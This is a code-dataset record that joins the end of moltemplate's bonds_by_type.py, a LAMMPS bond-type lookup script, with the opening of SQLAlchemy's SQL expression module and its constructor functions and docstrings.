' To find out where the mistake occured, search the \n'
' \"ttree_assignments.txt\" file for:\n'
' \"' + atomid2 + '\"\n')
atomtype1 = atomids2types[atomid1]
atomtype2 = atomids2types[atomid2]
for typepattern, coefftype in typepattern_to_coefftypes:
# use string comparisons to check if atom types match the pattern
if (ttree_lex.MatchesAll((atomtype1, atomtype2), typepattern) or
ttree_lex.MatchesAll((atomtype2, atomtype1), typepattern)):
# ("MatchesAll()" defined in "ttree_lex.py")
bond_types[ie] = coefftype
for ie in range(0, len(bond_ids)):
if not bond_types[ie]:
(atomid1, atomid2) = bond_pairs[ie]
atomtype1 = atomids2types[atomid1]
atomtype2 = atomids2types[atomid2]
raise ttree_lex.InputError('Error: No bond types defined for the bond between\n'
' atoms ' + atomid1 +
' (type ' + atomtype1 + ')\n'
' and ' + atomid2 + ' (type ' + atomtype2 + ')\n'
'\n'
' (If you are using a force field, then it probably means that you made a\n'
' mistake choosing at least one of these two @atom types from the list\n'
' of available atom types supplied by the force field. To fix it, edit\n'
' the corresponding lines in the "Data Atoms" section of your LT file.)\n')
def main():
sys.stderr.write(g_program_name + ' v' +
g_version_str + ' ' + g_date_str + ' ')
if sys.version < '3':
sys.stderr.write(' (python version < 3)\n')
else:
sys.stderr.write('\n')
try:
fname_atoms = None
fname_bond_list = None
fname_bondsbytype = None
section_name = 'Data Bond List' # (This will be replaced later.)
atom_style = 'full'
prefix = ''
suffix = ''
bond_lack_types = False
argv = [arg for arg in sys.argv]
# Loop over the remaining arguments not processed yet.
# These arguments are specific to the lttree.py program
# and are not understood by ttree.py:
i = 1
while i < len(argv):
#sys.stderr.write('argv['+str(i)+'] = \"'+argv[i]+'\"\n')
if ((argv[i].lower() == '-?') or
(argv[i].lower() == '--?') or
(argv[i].lower() == '-help') or
(argv[i].lower() == '-help')):
if i + 1 >= len(argv):
sys.stdout.write(man_page_text + '\n')
sys.exit(0)
elif argv[i].lower() == '-atoms':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a file name containing lines of\n'
' text which might appear in the "Atoms" section of a LAMMPS data file.\n')
fname_atoms = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-bonds':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a file name containing lines of\n'
' text which might appear in the "Bonds" section of a LAMMPS data file.\n')
fname_bond_list = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-bond-list':
if i + 1 >= len(argv):
raise ttree_lex.InputError(
'Error: ' + argv[i] + ' flag should be followed by a file name\n')
# raise ttree_lex.InputError('Error: '+argv[i]+' flag should be followed by a file name containing lines of\n'
# ' text which might appear in the "Bonds No Types" section of a LAMMPS data file.\n')
fname_bond_list = argv[i + 1]
section_name = "Data Bond List"
del(argv[i:i + 2])
elif argv[i].lower() == '-bondsbytype':
if i + 1 >= len(argv):
raise ttree_lex.InputError(
'Error: ' + argv[i] + ' flag should be followed by a file name\n')
# raise ttree_lex.InputError('Error: '+argv[i]+' flag should be followed by a file name containing\n'
# ' text which might appear in the "'+section_name+' By Type" section\n'
# ' of a LAMMPS data file.\n')
fname_bondsbytype = argv[i + 1]
del(argv[i:i + 2])
elif ((argv[i].lower() == '-atom-style') or
(argv[i].lower() == '-atom_style')):
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a an atom_style name.\n'
' (Or single quoted string which includes a space-separated\n'
' list of column names.)\n')
atom_style = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-prefix':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a prefix string\n'
' (a string you want to appear to the left of the integer\n'
' which counts the bonded interactions you have generated.)\n')
prefix = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-suffix':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a suffix string\n'
' (a string you want to appear to the right of the integer\n'
' which counts the bonded interactions you have generated.)\n')
prefix = argv[i + 1]
del(argv[i:i + 2])
elif argv[i][0] == '-':
raise ttree_lex.InputError('Error(' + g_program_name + '):\n'
'Unrecogized command line argument \"' + argv[i] + '\"\n')
else:
i += 1
if len(argv) != 1:
# if there are more than 2 remaining arguments,
problem_args = ['\"' + arg + '\"' for arg in argv[1:]]
raise ttree_lex.InputError('Syntax Error(' + g_program_name + '):\n\n'
' Problem with argument list.\n'
' The remaining arguments are:\n\n'
' ' +
(' '.join(problem_args)) + '\n\n'
' (The actual problem may be earlier in the argument list.)\n')
bond_types = []
bond_ids = []
bond_pairs = []
fatoms = open(fname_atoms, 'r')
fbonds = open(fname_bond_list, 'r')
fbondsbytype = open(fname_bondsbytype, 'r')
lines_atoms = fatoms.readlines()
lines_bonds = fbonds.readlines()
lines_bondsbytype = fbondsbytype.readlines()
fatoms.close()
fbonds.close()
fbondsbytype.close()
LookupBondTypes(bond_types,
bond_ids,
bond_pairs,
lines_atoms,
lines_bonds,
lines_bondsbytype,
atom_style,
section_name,
prefix='',
suffix='')
assert(len(bond_types) == len(bond_ids) == len(bond_pairs))
ie = 0
N = len(bond_types)
for ie in range(0, N):
sys.stdout.write(bond_ids[ie] + ' ' +
bond_types[ie] + ' ' +
bond_pairs[ie][0] + ' ' +
bond_pairs[ie][1] + '\n')
except (ValueError, ttree_lex.InputError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == "__main__":
main()
|
smsaladi/moltemplate
|
moltemplate/bonds_by_type.py
|
Python
|
bsd-3-clause
| 16,486
|
[
"LAMMPS"
] |
9bba8d033623e09568034dc73e0a78756006dda45fbcd95ae26b5544c9d51364
|
# expression.py
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010 Michael Bayer mike_mp@zzzcomputing.com
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines the base components of SQL expression trees.
All components are derived from a common base class
:class:`ClauseElement`. Common behaviors are organized
based on class hierarchies, in some cases via mixins.
All object construction from this package occurs via functions which
in some cases will construct composite :class:`ClauseElement` structures
together, and in other cases simply return a single :class:`ClauseElement`
constructed directly. The function interface affords a more "DSL-ish"
feel to constructing SQL expressions and also allows future class
reorganizations.
Even though classes are not constructed directly from the outside,
most classes which have additional public methods are considered to be
public (i.e. have no leading underscore). Other classes which are
"semi-public" are marked with a single leading underscore; these
classes usually have few or no public methods and are less guaranteed
to stay the same in future releases.
"""
import itertools, re
from operator import attrgetter
from sqlalchemy import util, exc #, types as sqltypes
from sqlalchemy.sql import operators
from sqlalchemy.sql.visitors import Visitable, cloned_traverse
import operator
functions, schema, sql_util, sqltypes = None, None, None, None
DefaultDialect, ClauseAdapter, Annotated = None, None, None
__all__ = [
'Alias', 'ClauseElement',
'ColumnCollection', 'ColumnElement',
'CompoundSelect', 'Delete', 'FromClause', 'Insert', 'Join',
'Select', 'Selectable', 'TableClause', 'Update', 'alias', 'and_', 'asc',
'between', 'bindparam', 'case', 'cast', 'column', 'delete',
'desc', 'distinct', 'except_', 'except_all', 'exists', 'extract', 'func',
'modifier', 'collate',
'insert', 'intersect', 'intersect_all', 'join', 'label', 'literal',
'literal_column', 'not_', 'null', 'or_', 'outparam', 'outerjoin', 'select',
'subquery', 'table', 'text', 'tuple_', 'union', 'union_all', 'update', ]
PARSE_AUTOCOMMIT = util._symbol('PARSE_AUTOCOMMIT')
def desc(column):
"""Return a descending ``ORDER BY`` clause element.
e.g.::
order_by = [desc(table1.mycol)]
"""
return _UnaryExpression(column, modifier=operators.desc_op)
def asc(column):
"""Return an ascending ``ORDER BY`` clause element.
e.g.::
order_by = [asc(table1.mycol)]
"""
return _UnaryExpression(column, modifier=operators.asc_op)
def outerjoin(left, right, onclause=None):
"""Return an ``OUTER JOIN`` clause element.
The returned object is an instance of :class:`Join`.
Similar functionality is also available via the :func:`outerjoin()`
method on any :class:`FromClause`.
left
The left side of the join.
right
The right side of the join.
onclause
Optional criterion for the ``ON`` clause, is derived from
foreign key relationships established between left and right
otherwise.
To chain joins together, use the :func:`join()` or :func:`outerjoin()`
methods on the resulting :class:`Join` object.
"""
return Join(left, right, onclause, isouter=True)
def join(left, right, onclause=None, isouter=False):
"""Return a ``JOIN`` clause element (regular inner join).
The returned object is an instance of :class:`Join`.
Similar functionality is also available via the :func:`join()` method
on any :class:`FromClause`.
left
The left side of the join.
right
The right side of the join.
onclause
Optional criterion for the ``ON`` clause, is derived from
foreign key relationships established between left and right
otherwise.
To chain joins together, use the :func:`join()` or :func:`outerjoin()`
methods on the resulting :class:`Join` object.
"""
return Join(left, right, onclause, isouter)
def select(columns=None, whereclause=None, from_obj=[], **kwargs):
"""Returns a ``SELECT`` clause element.
Similar functionality is also available via the :func:`select()`
method on any :class:`FromClause`.
The returned object is an instance of :class:`Select`.
All arguments which accept :class:`ClauseElement` arguments also accept
string arguments, which will be converted as appropriate into
either :func:`text()` or :func:`literal_column()` constructs.
columns
A list of :class:`ClauseElement` objects, typically :class:`ColumnElement`
objects or subclasses, which will form the columns clause of the
resulting statement. For all members which are instances of
:class:`Selectable`, the individual :class:`ColumnElement` members of the
:class:`Selectable` will be added individually to the columns clause.
For example, specifying a :class:`~sqlalchemy.schema.Table` instance will result in all
the contained :class:`~sqlalchemy.schema.Column` objects within to be added to the
columns clause.
This argument is not present on the form of :func:`select()`
available on :class:`~sqlalchemy.schema.Table`.
whereclause
A :class:`ClauseElement` expression which will be used to form the
``WHERE`` clause.
from_obj
A list of :class:`ClauseElement` objects which will be added to the
``FROM`` clause of the resulting statement. Note that "from"
objects are automatically located within the columns and
whereclause ClauseElements. Use this parameter to explicitly
specify "from" objects which are not automatically locatable.
This could include :class:`~sqlalchemy.schema.Table` objects that aren't otherwise
present, or :class:`Join` objects whose presence will supercede that
of the :class:`~sqlalchemy.schema.Table` objects already located in the other clauses.
\**kwargs
Additional parameters include:
autocommit
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
prefixes
a list of strings or :class:`ClauseElement` objects to include
directly after the SELECT keyword in the generated statement,
for dialect-specific query features.
distinct=False
when ``True``, applies a ``DISTINCT`` qualifier to the columns
clause of the resulting statement.
use_labels=False
when ``True``, the statement will be generated using labels
for each column in the columns clause, which qualify each
column with its parent table's (or aliases) name so that name
conflicts between columns in different tables don't occur.
The format of the label is <tablename>_<column>. The "c"
collection of the resulting :class:`Select` object will use these
names as well for targeting column members.
for_update=False
when ``True``, applies ``FOR UPDATE`` to the end of the
resulting statement. Certain database dialects also support
alternate values for this parameter, for example mysql
supports "read" which translates to ``LOCK IN SHARE MODE``,
and oracle supports "nowait" which translates to ``FOR UPDATE
NOWAIT``.
correlate=True
indicates that this :class:`Select` object should have its
contained :class:`FromClause` elements "correlated" to an enclosing
:class:`Select` object. This means that any :class:`ClauseElement`
instance within the "froms" collection of this :class:`Select`
which is also present in the "froms" collection of an
enclosing select will not be rendered in the ``FROM`` clause
of this select statement.
group_by
a list of :class:`ClauseElement` objects which will comprise the
``GROUP BY`` clause of the resulting select.
having
a :class:`ClauseElement` that will comprise the ``HAVING`` clause
of the resulting select when ``GROUP BY`` is used.
order_by
a scalar or list of :class:`ClauseElement` objects which will
comprise the ``ORDER BY`` clause of the resulting select.
limit=None
a numerical value which usually compiles to a ``LIMIT``
expression in the resulting select. Databases that don't
support ``LIMIT`` will attempt to provide similar
functionality.
offset=None
a numeric value which usually compiles to an ``OFFSET``
expression in the resulting select. Databases that don't
support ``OFFSET`` will attempt to provide similar
functionality.
bind=None
an ``Engine`` or ``Connection`` instance to which the
resulting ``Select ` object will be bound. The ``Select``
object will otherwise automatically bind to whatever
``Connectable`` instances can be located within its contained
:class:`ClauseElement` members.
"""
return Select(columns, whereclause=whereclause, from_obj=from_obj, **kwargs)
def subquery(alias, *args, **kwargs):
"""Return an :class:`Alias` object derived
from a :class:`Select`.
name
alias name
\*args, \**kwargs
all other arguments are delivered to the
:func:`select` function.
"""
return Select(*args, **kwargs).alias(alias)
def insert(table, values=None, inline=False, **kwargs):
"""Return an :class:`Insert` clause element.
Similar functionality is available via the :func:`insert()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be inserted into.
:param values: A dictionary which specifies the column specifications of the
``INSERT``, and is optional. If left as None, the column
specifications are determined from the bind parameters used
during the compile phase of the ``INSERT`` statement. If the
bind parameters also are None during the compile phase, then the
column specifications will be generated from the full list of
table columns. Note that the :meth:`~Insert.values()` generative method
may also be used for this.
:param prefixes: A list of modifier keywords to be inserted between INSERT
and INTO. Alternatively, the :meth:`~Insert.prefix_with` generative method
may be used.
:param inline: if True, SQL defaults will be compiled 'inline' into the
statement and not pre-executed.
If both `values` and compile-time bind parameters are present, the
compile-time bind parameters override the information specified
within `values` on a per-key basis.
The keys within `values` can be either :class:`~sqlalchemy.schema.Column` objects or their
string identifiers. Each key may reference one of:
* a literal data value (i.e. string, number, etc.);
* a Column object;
* a SELECT statement.
If a ``SELECT`` statement is specified which references this
``INSERT`` statement's table, the statement will be correlated
against the ``INSERT`` statement.
"""
return Insert(table, values, inline=inline, **kwargs)
def update(table, whereclause=None, values=None, inline=False, **kwargs):
"""Return an :class:`Update` clause element.
Similar functionality is available via the :func:`update()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be updated.
:param whereclause: A :class:`ClauseElement` describing the ``WHERE`` condition
of the ``UPDATE`` statement. Note that the :meth:`~Update.where()`
generative method may also be used for this.
:param values:
A dictionary which specifies the ``SET`` conditions of the
``UPDATE``, and is optional. If left as None, the ``SET``
conditions are determined from the bind parameters used during
the compile phase of the ``UPDATE`` statement. If the bind
parameters also are None during the compile phase, then the
``SET`` conditions will be generated from the full list of table
columns. Note that the :meth:`~Update.values()` generative method may
also be used for this.
:param inline:
if True, SQL defaults will be compiled 'inline' into the statement
and not pre-executed.
If both `values` and compile-time bind parameters are present, the
compile-time bind parameters override the information specified
within `values` on a per-key basis.
The keys within `values` can be either :class:`~sqlalchemy.schema.Column` objects or their
string identifiers. Each key may reference one of:
* a literal data value (i.e. string, number, etc.);
* a Column object;
* a SELECT statement.
If a ``SELECT`` statement is specified which references this
``UPDATE`` statement's table, the statement will be correlated
against the ``UPDATE`` statement.
"""
return Update(
table,
whereclause=whereclause,
values=values,
inline=inline,
**kwargs)
def delete(table, whereclause = None, **kwargs):
"""Return a :class:`Delete` clause element.
Similar functionality is available via the :func:`delete()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be updated.
:param whereclause: A :class:`ClauseElement` describing the ``WHERE``
condition of the ``UPDATE`` statement. Note that the :meth:`~Delete.where()`
generative method may be used instead.
"""
return Delete(table, whereclause, **kwargs)
def and_(*clauses):
"""Join a list of clauses together using the ``AND`` operator.
The ``&`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
if len(clauses) == 1:
return clauses[0]
return BooleanClauseList(operator=operators.and_, *clauses)
def or_(*clauses):
"""Join a list of clauses together using the ``OR`` operator.
The ``|`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
if len(clauses) == 1:
return clauses[0]
return BooleanClauseList(operator=operators.or_, *clauses)
def not_(clause):
"""Return a negation of the given clause, i.e. ``NOT(clause)``.
The ``~`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
return operators.inv(_literal_as_binds(clause))
def distinct(expr):
"""Return a ``DISTINCT`` clause."""
expr = _literal_as_binds(expr)
return _UnaryExpression(expr, operator=operators.distinct_op, type_=expr.type)
def between(ctest, cleft, cright):
"""Return a ``BETWEEN`` predicate clause.
Equivalent of SQL ``clausetest BETWEEN clauseleft AND clauseright``.
The :func:`between()` method on all
:class:`_CompareMixin` subclasses provides
similar functionality.
"""
ctest = _literal_as_binds(ctest)
return ctest.between(cleft, cright)
def case(whens, value=None, else_=None):
"""Produce a ``CASE`` statement.
whens
A sequence of pairs, or alternatively a dict,
to be translated into "WHEN / THEN" clauses.
value
Optional for simple case statements, produces
a column expression as in "CASE <expr> WHEN ..."
else\_
Optional as well, for case defaults produces
the "ELSE" portion of the "CASE" statement.
The expressions used for THEN and ELSE,
when specified as strings, will be interpreted
as bound values. To specify textual SQL expressions
for these, use the literal_column(<string>) or
text(<string>) construct.
The expressions used for the WHEN criterion
may only be literal strings when "value" is
present, i.e. CASE table.somecol WHEN "x" THEN "y".
Otherwise, literal strings are not accepted
in this position, and either the text(<string>)
or literal(<string>) constructs must be used to
interpret raw string values.
Usage examples::
case([(orderline.c.qty > 100, item.c.specialprice),
(orderline.c.qty > 10, item.c.bulkprice)
], else_=item.c.regularprice)
case(value=emp.c.type, whens={
'engineer': emp.c.salary * 1.1,
'manager': emp.c.salary * 3,
})
Using :func:`literal_column()`, to allow for databases that
do not support bind parameters in the ``then`` clause. The type
can be specified which determines the type of the :func:`case()` construct
overall::
case([(orderline.c.qty > 100, literal_column("'greaterthan100'", String)),
(orderline.c.qty > 10, literal_column("'greaterthan10'", String))
], else_=literal_column("'lethan10'", String))
"""
return _Case(whens, value=value, else_=else_)
def cast(clause, totype, **kwargs):
"""Return a ``CAST`` function.
Equivalent of SQL ``CAST(clause AS totype)``.
Use with a :class:`~sqlalchemy.types.TypeEngine` subclass, i.e::
cast(table.c.unit_price * table.c.qty, Numeric(10,4))
or::
cast(table.c.timestamp, DATE)
"""
return _Cast(clause, totype, **kwargs)
def extract(field, expr):
"""Return the clause ``extract(field FROM expr)``."""
return _Extract(field, expr)
def collate(expression, collation):
"""Return the clause ``expression COLLATE collation``."""
expr = _literal_as_binds(expression)
return _BinaryExpression(
expr,
_literal_as_text(collation),
operators.collate, type_=expr.type)
def exists(*args, **kwargs):
"""Return an ``EXISTS`` clause as applied to a :class:`Select` object.
Calling styles are of the following forms::
# use on an existing select()
s = select([table.c.col1]).where(table.c.col2==5)
s = exists(s)
# construct a select() at once
exists(['*'], **select_arguments).where(criterion)
# columns argument is optional, generates "EXISTS (SELECT *)"
# by default.
exists().where(table.c.col2==5)
"""
return _Exists(*args, **kwargs)
def union(*selects, **kwargs):
"""Return a ``UNION`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
A similar :func:`union()` method is available on all
:class:`FromClause` subclasses.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('UNION', *selects, **kwargs)
def union_all(*selects, **kwargs):
"""Return a ``UNION ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
A similar :func:`union_all()` method is available on all
:class:`FromClause` subclasses.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('UNION ALL', *selects, **kwargs)
def except_(*selects, **kwargs):
"""Return an ``EXCEPT`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('EXCEPT', *selects, **kwargs)
def except_all(*selects, **kwargs):
"""Return an ``EXCEPT ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('EXCEPT ALL', *selects, **kwargs)
def intersect(*selects, **kwargs):
"""Return an ``INTERSECT`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('INTERSECT', *selects, **kwargs)
def intersect_all(*selects, **kwargs):
"""Return an ``INTERSECT ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('INTERSECT ALL', *selects, **kwargs)
def alias(selectable, alias=None):
"""Return an :class:`Alias` object.
An :class:`Alias` represents any :class:`FromClause`
with an alternate name assigned within SQL, typically using the ``AS``
clause when generated, e.g. ``SELECT * FROM table AS aliasname``.
Similar functionality is available via the :func:`alias()` method
available on all :class:`FromClause` subclasses.
selectable
any :class:`FromClause` subclass, such as a table, select
statement, etc..
alias
string name to be assigned as the alias. If ``None``, a
random name will be generated.
"""
return Alias(selectable, alias=alias)
def literal(value, type_=None):
"""Return a literal clause, bound to a bind parameter.
Literal clauses are created automatically when non- :class:`ClauseElement`
objects (such as strings, ints, dates, etc.) are used in a comparison
operation with a :class:`_CompareMixin`
subclass, such as a :class:`~sqlalchemy.schema.Column` object. Use this function to force the
generation of a literal clause, which will be created as a
:class:`_BindParamClause` with a bound value.
:param value: the value to be bound. Can be any Python object supported by
the underlying DB-API, or is translatable via the given type argument.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine` which
will provide bind-parameter translation for this literal.
"""
return _BindParamClause(None, value, type_=type_, unique=True)
def tuple_(*expr):
"""Return a SQL tuple.
Main usage is to produce a composite IN construct::
tuple_(table.c.col1, table.c.col2).in_(
[(1, 2), (5, 12), (10, 19)]
)
"""
return _Tuple(*expr)
def label(name, obj):
"""Return a :class:`_Label` object for the
given :class:`ColumnElement`.
A label changes the name of an element in the columns clause of a
``SELECT`` statement, typically via the ``AS`` SQL keyword.
This functionality is more conveniently available via the
:func:`label()` method on :class:`ColumnElement`.
name
label name
obj
a :class:`ColumnElement`.
"""
return _Label(name, obj)
def column(text, type_=None):
"""Return a textual column clause, as would be in the columns clause of a
``SELECT`` statement.
The object returned is an instance of
:class:`ColumnClause`, which represents the
"syntactical" portion of the schema-level
:class:`~sqlalchemy.schema.Column` object.
text
the name of the column. Quoting rules will be applied to the
clause like any other column name. For textual column
constructs that are not to be quoted, use the
:func:`literal_column` function.
type\_
an optional :class:`~sqlalchemy.types.TypeEngine` object which will
provide result-set translation for this column.
"""
return ColumnClause(text, type_=type_)
def literal_column(text, type_=None):
"""Return a textual column expression, as would be in the columns
clause of a ``SELECT`` statement.
The object returned supports further expressions in the same way as any
other column object, including comparison, math and string operations.
The type\_ parameter is important to determine proper expression behavior
(such as, '+' means string concatenation or numerical addition based on
the type).
text
the text of the expression; can be any SQL expression. Quoting rules
will not be applied. To specify a column-name expression which should
be subject to quoting rules, use the
:func:`column` function.
type\_
an optional :class:`~sqlalchemy.types.TypeEngine` object which will
provide result-set translation and additional expression semantics for
this column. If left as None the type will be NullType.
"""
return ColumnClause(text, type_=type_, is_literal=True)
def table(name, *columns):
"""Return a :class:`TableClause` object.
This is a primitive version of the :class:`~sqlalchemy.schema.Table` object,
which is a subclass of this object.
"""
return TableClause(name, *columns)
def bindparam(key, value=None, type_=None, unique=False, required=False):
"""Create a bind parameter clause with the given key.
value
a default value for this bind parameter. a bindparam with a
value is called a ``value-based bindparam``.
type\_
a sqlalchemy.types.TypeEngine object indicating the type of this
bind param, will invoke type-specific bind parameter processing
unique
if True, bind params sharing the same name will have their
underlying ``key`` modified to a uniquely generated name.
mostly useful with value-based bind params.
required
A value is required at execution time.
"""
if isinstance(key, ColumnClause):
return _BindParamClause(key.name, value, type_=key.type, unique=unique, required=required)
else:
return _BindParamClause(key, value, type_=type_, unique=unique, required=required)
def outparam(key, type_=None):
"""Create an 'OUT' parameter for usage in functions (stored procedures),
for databases which support them.
The ``outparam`` can be used like a regular function parameter.
The "output" value will be available from the
:class:`~sqlalchemy.engine.ResultProxy` object via its ``out_parameters``
attribute, which returns a dictionary containing the values.
"""
return _BindParamClause(
key, None, type_=type_, unique=False, isoutparam=True)
def text(text, bind=None, *args, **kwargs):
"""Create literal text to be inserted into a query.
When constructing a query from a :func:`select()`, :func:`update()`,
:func:`insert()` or :func:`delete()`, using plain strings for argument
values will usually result in text objects being created
automatically. Use this function when creating textual clauses
outside of other :class:`ClauseElement` objects, or optionally wherever
plain text is to be used.
text
the text of the SQL statement to be created. use ``:<param>``
to specify bind parameters; they will be compiled to their
engine-specific format.
bind
an optional connection or engine to be used for this text query.
autocommit=True
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
bindparams
a list of :func:`bindparam()` instances which can be used to define
the types and/or initial values for the bind parameters within
the textual statement; the keynames of the bindparams must match
those within the text of the statement. The types will be used
for pre-processing on bind values.
typemap
a dictionary mapping the names of columns represented in the
``SELECT`` clause of the textual statement to type objects,
which will be used to perform post-processing on columns within
the result set (for textual statements that produce result
sets).
"""
return _TextClause(text, bind=bind, *args, **kwargs)
def null():
"""Return a :class:`_Null` object, which compiles to ``NULL`` in a sql
statement.
"""
return _Null()
class _FunctionGenerator(object):
"""Generate :class:`Function` objects based on getattr calls."""
def __init__(self, **opts):
self.__names = []
self.opts = opts
def __getattr__(self, name):
# passthru __ attributes; fixes pydoc
if name.startswith('__'):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
elif name.endswith('_'):
name = name[0:-1]
f = _FunctionGenerator(**self.opts)
f.__names = list(self.__names) + [name]
return f
def __call__(self, *c, **kwargs):
o = self.opts.copy()
o.update(kwargs)
if len(self.__names) == 1:
global functions
if functions is None:
from sqlalchemy.sql import functions
func = getattr(functions, self.__names[-1].lower(), None)
if func is not None:
return func(*c, **o)
return Function(
self.__names[-1], packagenames=self.__names[0:-1], *c, **o)
# "func" global - i.e. func.count()
func = _FunctionGenerator()
# "modifier" global - i.e. modifier.distinct
# TODO: use UnaryExpression for this instead ?
modifier = _FunctionGenerator(group=False)
class _generated_label(unicode):
"""A unicode subclass used to identify dynamically generated names."""
def _escape_for_generated(x):
if isinstance(x, _generated_label):
return x
else:
return x.replace('%', '%%')
def _clone(element):
return element._clone()
def _expand_cloned(elements):
"""expand the given set of ClauseElements to be the set of all 'cloned'
predecessors.
"""
return itertools.chain(*[x._cloned_set for x in elements])
def _select_iterables(elements):
"""expand tables into individual columns in the
given list of column expressions.
"""
return itertools.chain(*[c._select_iterable for c in elements])
def _cloned_intersection(a, b):
"""return the intersection of sets a and b, counting
any overlap between 'cloned' predecessors.
The returned set is in terms of the enties present within 'a'.
"""
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a if all_overlap.intersection(elem._cloned_set))
def _compound_select(keyword, *selects, **kwargs):
return CompoundSelect(keyword, *selects, **kwargs)
def _is_literal(element):
return not isinstance(element, Visitable) and \
not hasattr(element, '__clause_element__')
def _from_objects(*elements):
return itertools.chain(*[element._from_objects for element in elements])
def _labeled(element):
if not hasattr(element, 'name'):
return element.label(None)
else:
return element
def _column_as_key(element):
if isinstance(element, basestring):
return element
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return element.key
def _literal_as_text(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
return _TextClause(unicode(element))
else:
return element
def _clause_element_as_expr(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
else:
return element
def _literal_as_column(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
return literal_column(str(element))
else:
return element
def _literal_as_binds(element, name=None, type_=None):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
if element is None:
return null()
else:
return _BindParamClause(name, element, type_=type_, unique=True)
else:
return element
def _type_from_args(args):
for a in args:
if not isinstance(a.type, sqltypes.NullType):
return a.type
else:
return sqltypes.NullType
def _no_literals(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
raise exc.ArgumentError("Ambiguous literal: %r. Use the 'text()' function "
"to indicate a SQL expression literal, or 'literal()' to indicate a bound value." % element)
else:
return element
def _corresponding_column_or_error(fromclause, column, require_embedded=False):
c = fromclause.corresponding_column(column,
require_embedded=require_embedded)
if c is None:
raise exc.InvalidRequestError(
"Given column '%s', attached to table '%s', "
"failed to locate a corresponding column from table '%s'"
%
(column,
getattr(column, 'table', None),fromclause.description)
)
return c
@util.decorator
def _generative(fn, *args, **kw):
"""Mark a method as generative."""
self = args[0]._generate()
fn(self, *args[1:], **kw)
return self
def is_column(col):
"""True if ``col`` is an instance of :class:`ColumnElement`."""
return isinstance(col, ColumnElement)
class ClauseElement(Visitable):
"""Base class for elements of a programmatically constructed SQL
expression.
"""
__visit_name__ = 'clause'
_annotations = {}
supports_execution = False
_from_objects = []
_bind = None
def _clone(self):
"""Create a shallow copy of this ClauseElement.
This method may be used by a generative API. Its also used as
part of the "deep" copy afforded by a traversal that combines
the _copy_internals() method.
"""
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
c.__dict__.pop('_cloned_set', None)
# this is a marker that helps to "equate" clauses to each other
# when a Select returns its list of FROM clauses. the cloning
# process leaves around a lot of remnants of the previous clause
# typically in the form of column expressions still attached to the
# old table.
c._is_clone_of = self
return c
@util.memoized_property
def _cloned_set(self):
"""Return the set consisting all cloned anscestors of this
ClauseElement.
Includes this ClauseElement. This accessor tends to be used for
FromClause objects to identify 'equivalent' FROM clauses, regardless
of transformative operations.
"""
s = util.column_set()
f = self
while f is not None:
s.add(f)
f = getattr(f, '_is_clone_of', None)
return s
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_is_clone_of', None)
return d
if util.jython:
def __hash__(self):
"""Return a distinct hash code.
ClauseElements may have special equality comparisons which
makes us rely on them having unique hash codes for use in
hash-based collections. Stock __hash__ doesn't guarantee
unique values on platforms with moving GCs.
"""
return id(self)
def _annotate(self, values):
"""return a copy of this ClauseElement with the given annotations
dictionary.
"""
global Annotated
if Annotated is None:
from sqlalchemy.sql.util import Annotated
return Annotated(self, values)
def _deannotate(self):
"""return a copy of this ClauseElement with an empty annotations
dictionary.
"""
return self._clone()
def unique_params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elments replaced.
